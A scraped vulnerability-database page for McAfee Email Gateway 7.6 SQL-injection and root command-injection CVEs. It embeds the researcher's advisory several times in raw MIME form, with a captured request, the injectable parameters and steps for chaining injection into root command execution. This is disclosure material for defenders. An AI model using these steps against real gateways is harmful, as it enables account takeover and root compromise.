VARIoT IoT vulnerabilities database
| VAR-201312-0316 | CVE-2013-7103 | McAfee Email Gateway Vulnerable to arbitrary command execution |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the value attribute in a (1) TestFile XML element or the (2) hostname. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to execute arbitrary command, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. --047d7bd6c5d012977c04eca87ee7
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
McAfee Email Gateway 7.6 multiple vulnerabilities
http <http://www.mcafee.com/us/products/email-gateway.aspx>://<http://www.m=
cafee.com/us/products/email-gateway.aspx>
www <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
mcafee <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.m=
cafee.com/us/products/email-gateway.aspx>
com <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
us <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcafe=
e.com/us/products/email-gateway.aspx>
products <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www=
.mcafee.com/us/products/email-gateway.aspx>
email <http://www.mcafee.com/us/products/email-gateway.aspx>-<http://www.mc=
afee.com/us/products/email-gateway.aspx>
gateway <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.=
mcafee.com/us/products/email-gateway.aspx>
aspx <http://www.mcafee.com/us/products/email-gateway.aspx> -- Has free
trial
Many instances of SQL injection were found as an unprivileged read-only
authenticated user that allow the user to completely take over the accounts
of other users by using a stacked injection technique to run UPDATE
statements. Other techniques available are error-based, time-based, and
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=3DUTF-8
Referer:
https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm=
l/index.html
Content-Length: 626
Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"=
:{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e=
vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"=
,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem=
s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems=
":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em=
ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat=
egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp=
e":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with burpsuite and alter each value
by adding an apostrophe to view the SQL error in the response. You can also
use SQLmap to try various techniques for exploitability.
------------------------------------------------------
Many remote command execution vulnerabilities exist for administrator
users. Every vector I found was being run as the root user and they all
exists within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, and replace it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose =93name=94 attrib=
ute
contains TestFile. Any of these elements are susceptible to command
injection within the =93value=94 attribute. These filenames seems to be pas=
sed
to a utility like =91test=92 to ensure whether or not it exists. By using s=
hell
metacharacters, you can execute arbitrary commands on the system as root.
The hostname within this request is also susceptible to command injection
via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
=931=94 instead of =930=94). You may alter or create any cron jobs that wil=
l be run
as root.
--=20
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--047d7bd6c5d012977c04eca87ee7
Content-Type: text/html; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><p class=3D"">McAfee Email Gateway 7.6 multiple vulnerabil=
ities</p>
<p class=3D""><a href=3D"http://www.mcafee.com/us/products/email-gateway.as=
px">http</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx=
">://</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">w=
ww</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">mcafee</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a><a h=
ref=3D"http://www.mcafee.com/us/products/email-gateway.aspx">com</a><a href=
=3D"http://www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"h=
ttp://www.mcafee.com/us/products/email-gateway.aspx">us</a><a href=3D"http:=
//www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www=
.mcafee.com/us/products/email-gateway.aspx">products</a><a href=3D"http://w=
ww.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www.mc=
afee.com/us/products/email-gateway.aspx">email</a><a href=3D"http://www.mca=
fee.com/us/products/email-gateway.aspx">-</a><a href=3D"http://www.mcafee.c=
om/us/products/email-gateway.aspx">gateway</a><a href=3D"http://www.mcafee.=
com/us/products/email-gateway.aspx">.</a><a href=3D"http://www.mcafee.com/u=
s/products/email-gateway.aspx">aspx</a> -- Has free trial</p>
<p class=3D"">=A0</p>
<p class=3D"">Many instances of SQL injection were found as an unprivileged
read-only authenticated user that allow the user to completely take over th=
e accounts of
other users by using a stacked injection technique to run UPDATE statements=
.
Other techniques available are error-based, time-based, and boolean-based
injections.</p>
<p class=3D"">=A0</p>
<p class=3D"">Several remote command execution vulnerabilities were found
as an administrator which are run as the local root user. By utilising the =
SQL
injections as an unprivileged user, a user can escalate privileges by updat=
ing
the password hash of an admin, and ultimately run commands on the server as
root.</p>
<p class=3D"">=A0</p>
<p class=3D"">However, no data seems to be able to be exfiltrated via the
command injections. You may receive a connect back, but no commands can be =
run
over the connect-back. My solution to this was to pipe the results of comma=
nds
into a file in /tmp, then use the SQL injections to read the file from the =
FS
and return the results.</p>
<p class=3D"">=A0</p>
<p class=3D"">---------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">As a read-only user with reporting capabilities, many SQL
injection vectors exist when creating new reports based on filters. You can=
get
to this part of the web app by clicking the Reports menu item at the top-ce=
nter.
The following request contains four exploitable SQL injections each exploit=
able
via a few different techniques:</p>
<p class=3D"">=A0</p>
<p class=3D"">POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1</p>
<p class=3D"">Host: <a href=3D"http://172.31.16.87:10443">172.31.16.87:1044=
3</a></p>
<p class=3D"">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0)
Gecko/20100101 Firefox/25.0</p>
<p class=3D"">Accept:
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8</p>
<p class=3D"">Accept-Language: en-US,en;q=3D0.5</p>
<p class=3D"">Accept-Encoding: gzip, deflate</p>
<p class=3D"">Content-Type: text/plain; charset=3DUTF-8</p>
<p class=3D"">Referer: <a href=3D"https://172.31.16.87:10443/admin/969bf547=
d36f6c7e4302952cf72a5ce3/en_US/html/index.html">https://172.31.16.87:10443/=
admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html</a></p>
<p class=3D"">Content-Length: 626</p>
<p class=3D"">Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86</p>
<p class=3D"">Connection: keep-alive</p>
<p class=3D"">Pragma: no-cache</p>
<p class=3D"">Cache-Control: no-cache</p>
<p class=3D"">=A0</p>
<p class=3D"">{"id":"loadreport","locale":&qu=
ot;en_US","commands":[{"name":"getDDSData&quo=
t;,"args":{"what":["events"],"filters&qu=
ot;:{"filter_period":"week","start_date":&quo=
t;Now","event_type":"ui_events","event_id&quo=
t;:"all","reason":"all"},"date_range&quo=
t;:"week","events_col":"edate","events_o=
rder":"DESC","events_offset":0,"events_nitems=
":50,"tz":480,"start_date":1385491876.405,"is=
_mail":false,"itemized_nitems":10,"itemized_offset"=
;:0,"emailstatus_nitems":50,"emailstatus_offset":0,&quo=
t;emailstatus_col":"edate","emailstatus_order":&qu=
ot;DESC","dig_filters":[],"dig_category":"&qu=
ot;,"dig_summarize":true,"init":true,"type":&=
quot;ui_events"}}],"filterType":"system","aut=
oconv":1}</p>
<p class=3D"">=A0</p>
<p class=3D"">Within the above request, the events_col, event_id, reason,
events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerab=
le
to SQL injection. You can capture the request with burpsuite and alter each
value by adding an apostrophe to view the SQL error in the response. You ca=
n
also use SQLmap to try various techniques for exploitability.</p>
<p class=3D"">=A0</p>
<p class=3D"">------------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">Many remote command execution vulnerabilities exist for
administrator users. Every vector I found was being run as the root user an=
d
they all exists within a single request. As an administrator, go to the Sys=
tem
tab in the top menu. You will be presented with general server settings. Re=
move
the last letter of the hostname, and replace it back. You will now have a g=
reen
checkmark in the top right of the web application. Click this, then click O=
K on
the dialog that pops up in the web app. The next captured request will be t=
he
request susceptible to command execution. It is a very large request with X=
ML
contained in JSON. Because this makes sense.</p>
<p class=3D"">=A0</p>
<p class=3D"">Within this XML, you may search for any XML element whose
=93name=94 attribute contains TestFile. Any of these elements are susceptib=
le to
command injection within the =93value=94 attribute. These filenames seems t=
o be
passed to a utility like =91test=92 to ensure whether or not it exists. Each
of these elements contains a small command to be run on a given event. You =
may
alter any of these to be run as root.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for an XML element called Script. This is
used to manage the cron jobs (make sure the corresponding Enabled element i=
s
set to =931=94 instead of =930=94). You may alter or create any cron jobs t=
hat will be
run as root.</p><div><br></div>-- <br><a href=3D"http://volatile-minds.blog=
spot.com">http://volatile-minds.blogspot.com</a> -- blog<br><a href=3D"http=
://www.volatileminds.net">http://www.volatileminds.net</a> -- website
</div>
--047d7bd6c5d012977c04eca87ee7--
| VAR-201312-0317 | CVE-2013-7104 | McAfee Email Gateway Vulnerabilities in arbitrary command execution |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands by specifying them in the value attribute in a (1) Command or (2) Script XML element. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email Gateway Contains a command execution vulnerability. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to execute arbitrary command, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. --047d7bd6c5d012977c04eca87ee7
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
McAfee Email Gateway 7.6 multiple vulnerabilities
http <http://www.mcafee.com/us/products/email-gateway.aspx>://<http://www.m=
cafee.com/us/products/email-gateway.aspx>
www <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
mcafee <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.m=
cafee.com/us/products/email-gateway.aspx>
com <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
us <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcafe=
e.com/us/products/email-gateway.aspx>
products <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www=
.mcafee.com/us/products/email-gateway.aspx>
email <http://www.mcafee.com/us/products/email-gateway.aspx>-<http://www.mc=
afee.com/us/products/email-gateway.aspx>
gateway <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.=
mcafee.com/us/products/email-gateway.aspx>
aspx <http://www.mcafee.com/us/products/email-gateway.aspx> -- Has free
trial
Many instances of SQL injection were found as an unprivileged read-only
authenticated user that allow the user to completely take over the accounts
of other users by using a stacked injection technique to run UPDATE
statements. Other techniques available are error-based, time-based, and
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=3DUTF-8
Referer:
https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm=
l/index.html
Content-Length: 626
Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"=
:{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e=
vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"=
,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem=
s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems=
":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em=
ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat=
egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp=
e":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with burpsuite and alter each value
by adding an apostrophe to view the SQL error in the response. You can also
use SQLmap to try various techniques for exploitability. Every vector I found was being run as the root user and they all
exists within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, and replace it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose =93name=94 attrib=
ute
contains TestFile. Any of these elements are susceptible to command
injection within the =93value=94 attribute. These filenames seems to be pas=
sed
to a utility like =91test=92 to ensure whether or not it exists. By using s=
hell
metacharacters, you can execute arbitrary commands on the system as root.
The hostname within this request is also susceptible to command injection
via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
=931=94 instead of =930=94). You may alter or create any cron jobs that wil=
l be run
as root.
--=20
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--047d7bd6c5d012977c04eca87ee7
Content-Type: text/html; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><p class=3D"">McAfee Email Gateway 7.6 multiple vulnerabil=
ities</p>
<p class=3D""><a href=3D"http://www.mcafee.com/us/products/email-gateway.as=
px">http</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx=
">://</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">w=
ww</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">mcafee</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a><a h=
ref=3D"http://www.mcafee.com/us/products/email-gateway.aspx">com</a><a href=
=3D"http://www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"h=
ttp://www.mcafee.com/us/products/email-gateway.aspx">us</a><a href=3D"http:=
//www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www=
.mcafee.com/us/products/email-gateway.aspx">products</a><a href=3D"http://w=
ww.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www.mc=
afee.com/us/products/email-gateway.aspx">email</a><a href=3D"http://www.mca=
fee.com/us/products/email-gateway.aspx">-</a><a href=3D"http://www.mcafee.c=
om/us/products/email-gateway.aspx">gateway</a><a href=3D"http://www.mcafee.=
com/us/products/email-gateway.aspx">.</a><a href=3D"http://www.mcafee.com/u=
s/products/email-gateway.aspx">aspx</a> -- Has free trial</p>
<p class=3D"">=A0</p>
<p class=3D"">Many instances of SQL injection were found as an unprivileged
read-only authenticated user that allow the user to completely take over th=
e accounts of
other users by using a stacked injection technique to run UPDATE statements=
.
Other techniques available are error-based, time-based, and boolean-based
injections.</p>
<p class=3D"">=A0</p>
<p class=3D"">Several remote command execution vulnerabilities were found
as an administrator which are run as the local root user. By utilising the =
SQL
injections as an unprivileged user, a user can escalate privileges by updat=
ing
the password hash of an admin, and ultimately run commands on the server as
root.</p>
<p class=3D"">=A0</p>
<p class=3D"">However, no data seems to be able to be exfiltrated via the
command injections. You may receive a connect back, but no commands can be =
run
over the connect-back. My solution to this was to pipe the results of comma=
nds
into a file in /tmp, then use the SQL injections to read the file from the =
FS
and return the results.</p>
<p class=3D"">=A0</p>
<p class=3D"">---------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">As a read-only user with reporting capabilities, many SQL
injection vectors exist when creating new reports based on filters. You can=
get
to this part of the web app by clicking the Reports menu item at the top-ce=
nter.
The following request contains four exploitable SQL injections each exploit=
able
via a few different techniques:</p>
<p class=3D"">=A0</p>
<p class=3D"">POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1</p>
<p class=3D"">Host: <a href=3D"http://172.31.16.87:10443">172.31.16.87:1044=
3</a></p>
<p class=3D"">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0)
Gecko/20100101 Firefox/25.0</p>
<p class=3D"">Accept:
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8</p>
<p class=3D"">Accept-Language: en-US,en;q=3D0.5</p>
<p class=3D"">Accept-Encoding: gzip, deflate</p>
<p class=3D"">Content-Type: text/plain; charset=3DUTF-8</p>
<p class=3D"">Referer: <a href=3D"https://172.31.16.87:10443/admin/969bf547=
d36f6c7e4302952cf72a5ce3/en_US/html/index.html">https://172.31.16.87:10443/=
admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html</a></p>
<p class=3D"">Content-Length: 626</p>
<p class=3D"">Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86</p>
<p class=3D"">Connection: keep-alive</p>
<p class=3D"">Pragma: no-cache</p>
<p class=3D"">Cache-Control: no-cache</p>
<p class=3D"">=A0</p>
<p class=3D"">{"id":"loadreport","locale":&qu=
ot;en_US","commands":[{"name":"getDDSData&quo=
t;,"args":{"what":["events"],"filters&qu=
ot;:{"filter_period":"week","start_date":&quo=
t;Now","event_type":"ui_events","event_id&quo=
t;:"all","reason":"all"},"date_range&quo=
t;:"week","events_col":"edate","events_o=
rder":"DESC","events_offset":0,"events_nitems=
":50,"tz":480,"start_date":1385491876.405,"is=
_mail":false,"itemized_nitems":10,"itemized_offset"=
;:0,"emailstatus_nitems":50,"emailstatus_offset":0,&quo=
t;emailstatus_col":"edate","emailstatus_order":&qu=
ot;DESC","dig_filters":[],"dig_category":"&qu=
ot;,"dig_summarize":true,"init":true,"type":&=
quot;ui_events"}}],"filterType":"system","aut=
oconv":1}</p>
<p class=3D"">=A0</p>
<p class=3D"">Within the above request, the events_col, event_id, reason,
events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerab=
le
to SQL injection. You can capture the request with burpsuite and alter each
value by adding an apostrophe to view the SQL error in the response. You ca=
n
also use SQLmap to try various techniques for exploitability.</p>
<p class=3D"">=A0</p>
<p class=3D"">------------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">Many remote command execution vulnerabilities exist for
administrator users. Every vector I found was being run as the root user an=
d
they all exists within a single request. As an administrator, go to the Sys=
tem
tab in the top menu. You will be presented with general server settings. Re=
move
the last letter of the hostname, and replace it back. You will now have a g=
reen
checkmark in the top right of the web application. Click this, then click O=
K on
the dialog that pops up in the web app. The next captured request will be t=
he
request susceptible to command execution. It is a very large request with X=
ML
contained in JSON. Because this makes sense.</p>
<p class=3D"">=A0</p>
<p class=3D"">Within this XML, you may search for any XML element whose
=93name=94 attribute contains TestFile. Any of these elements are susceptib=
le to
command injection within the =93value=94 attribute. These filenames seems t=
o be
passed to a utility like =91test=92 to ensure whether or not it exists. By =
using shell
metacharacters, you can execute arbitrary commands on the system as root.</=
p>
<p class=3D"">=A0</p>
<p class=3D"">The hostname within this request is also susceptible to
command injection via shell metacharacters.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for any XML element called Command. Each
of these elements contains a small command to be run on a given event. You =
may
alter any of these to be run as root.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for an XML element called Script. This is
used to manage the cron jobs (make sure the corresponding Enabled element i=
s
set to =931=94 instead of =930=94). You may alter or create any cron jobs t=
hat will be
run as root.</p><div><br></div>-- <br><a href=3D"http://volatile-minds.blog=
spot.com">http://volatile-minds.blogspot.com</a> -- blog<br><a href=3D"http=
://www.volatileminds.net">http://www.volatileminds.net</a> -- website
</div>
--047d7bd6c5d012977c04eca87ee7--
| VAR-201312-0309 | CVE-2013-7092 | McAfee Email Gateway of /admin/cgi-bin/rpc/doReport/18 In SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Multiple SQL injection vulnerabilities in /admin/cgi-bin/rpc/doReport/18 in McAfee Email Gateway 7.6 allow remote authenticated users to execute arbitrary SQL commands via the (1) events_col, (2) event_id, (3) reason, (4) events_order, (5) emailstatus_order, or (6) emailstatus_col JSON keys. (1) events_col (2) event_id (3) reason (4) events_order (5) emailstatus_order (6) emailstatus_col.
Exploiting these issues could allow an attacker to execute arbitrary command, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. McAfee Email Gateway (MEG) is a suite of email security solutions from McAfee. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. A SQL injection vulnerability exists in /admin/cgi-bin/rpc/doReport/18 in MEG version 7.6. Other techniques available are error-based, time-based, and
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=3DUTF-8
Referer:
https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm=
l/index.html
Content-Length: 626
Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"=
:{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e=
vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"=
,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem=
s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems=
":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em=
ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat=
egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp=
e":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with burpsuite and alter each value
by adding an apostrophe to view the SQL error in the response. You can also
use SQLmap to try various techniques for exploitability.
------------------------------------------------------
Many remote command execution vulnerabilities exist for administrator
users. Every vector I found was being run as the root user and they all
exists within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, and replace it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose =93name=94 attrib=
ute
contains TestFile. Any of these elements are susceptible to command
injection within the =93value=94 attribute. These filenames seems to be pas=
sed
to a utility like =91test=92 to ensure whether or not it exists. By using s=
hell
metacharacters, you can execute arbitrary commands on the system as root.
The hostname within this request is also susceptible to command injection
via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
=931=94 instead of =930=94). You may alter or create any cron jobs that wil=
l be run
as root.
--=20
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--047d7bd6c5d012977c04eca87ee7
Content-Type: text/html; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><p class=3D"">McAfee Email Gateway 7.6 multiple vulnerabil=
ities</p>
<p class=3D""><a href=3D"http://www.mcafee.com/us/products/email-gateway.as=
px">http</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx=
">://</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">w=
ww</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">mcafee</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a><a h=
ref=3D"http://www.mcafee.com/us/products/email-gateway.aspx">com</a><a href=
=3D"http://www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"h=
ttp://www.mcafee.com/us/products/email-gateway.aspx">us</a><a href=3D"http:=
//www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www=
.mcafee.com/us/products/email-gateway.aspx">products</a><a href=3D"http://w=
ww.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www.mc=
afee.com/us/products/email-gateway.aspx">email</a><a href=3D"http://www.mca=
fee.com/us/products/email-gateway.aspx">-</a><a href=3D"http://www.mcafee.c=
om/us/products/email-gateway.aspx">gateway</a><a href=3D"http://www.mcafee.=
com/us/products/email-gateway.aspx">.</a><a href=3D"http://www.mcafee.com/u=
s/products/email-gateway.aspx">aspx</a> -- Has free trial</p>
<p class=3D"">=A0</p>
